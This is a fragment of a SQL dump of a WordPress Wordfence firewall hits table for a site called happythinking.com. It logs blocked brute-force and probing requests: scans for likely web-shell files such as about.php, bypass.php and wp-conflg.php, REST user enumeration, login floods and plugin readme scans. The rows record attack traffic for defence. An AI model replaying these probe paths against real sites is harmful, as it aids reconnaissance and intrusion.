(50499, 1711381153.767125, 1711381153.390200, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wb.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3diLnBocA==","category":"brute-force","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(50482, 1711358764.500619, 1711358764.054500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
(50483, 1711358754.080917, 1711358753.734500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(50484, 1711358740.447100, 1711358740.077200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(50498, 1711381155.725517, 1711381155.277400, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/xxc.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3h4Yy5waHA=","category":"brute-force","ssl":1}'),
(50485, 1711358727.014142, 1711358726.648700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50486, 1711358704.608720, 1711358704.167400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(50487, 1711358682.511928, 1711358682.160200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(50350, 1711097769.850085, 1711097769.569200, '\0\0\0\0\0\0\0\0\0\0ÿÿ^Hy''', 0, 403, 0, 0, 0, 'https://www.happythinking.com//?rest_route=%2Fwp%2Fv2%2Fusers', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8=","category":"brute-force","ssl":1}'),
(50332, 1711088649.387511, 1711088649.060400, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÉiJ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50318, 1711080835.690760, 1711080835.380000, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50324, 0.000000, 1711085057.152474, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50325, 0.000000, 1711085793.198723, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50326, 0.000000, 1711086527.024496, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50327, 0.000000, 1711087267.358532, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50328, 0.000000, 1711088015.943280, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50329, 1711088640.233221, 1711088639.950000, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÉiJ', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50353, 0.000000, 1711111403.154603, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ0ûæ', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50354, 1711113580.154461, 1711113579.124600, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ž', 0, 403, 0, 0, 0, 'https://www.happythinking.com//?rest_route=%2Fwp%2Fv2%2Fusers', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8=","category":"brute-force","ssl":1}'),
(50330, 1711088640.232882, 1711088639.950000, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÉiJ', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50331, 1711088649.387859, 1711088649.060400, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÉiJ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50950, 1712207836.727942, 1712207836.338800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(50937, 1712173497.970710, 1712173497.064100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50943, 1712173388.549967, 1712173387.050300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50946, 1712188481.320404, 1712188480.844800, '\0\0\0\0\0\0\0\0\0\0ÿÿmø¯w', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/layouts-for-elementor/readme.txt', NULL, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9sYXlvdXRzLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9sYXlvdXRzLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50938, 1712173474.094669, 1712173473.604900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/images/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2ltYWdlcy9hYm91dC5waHA=","category":"brute-force","ssl":1}'),
(50942, 1712173406.742314, 1712173406.404600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-includes/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50947, 0.000000, 1712207251.077522, '\0\0\0\0\0\0\0\0\0\0ÿÿx„c1', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50948, 1712207876.528240, 1712207876.141900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50941, 1712173424.295918, 1712173423.841800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/uploads/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hYm91dC5waHA=","category":"brute-force","ssl":1}'),
(50949, 1712207849.080302, 1712207848.603600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(50940, 1712173440.845544, 1712173440.383700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hYm91dC5waHA=","category":"brute-force","ssl":1}'),
(50939, 1712173454.337550, 1712173453.494100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-admin/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50936, 1712173518.725861, 1712173518.056300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvYWJvdXQucGhw","category":"brute-force","ssl":1}'),
(50944, 0.000000, 1712180410.780274, '\0\0\0\0\0\0\0\0\0\0ÿÿgnVÙ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.happythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
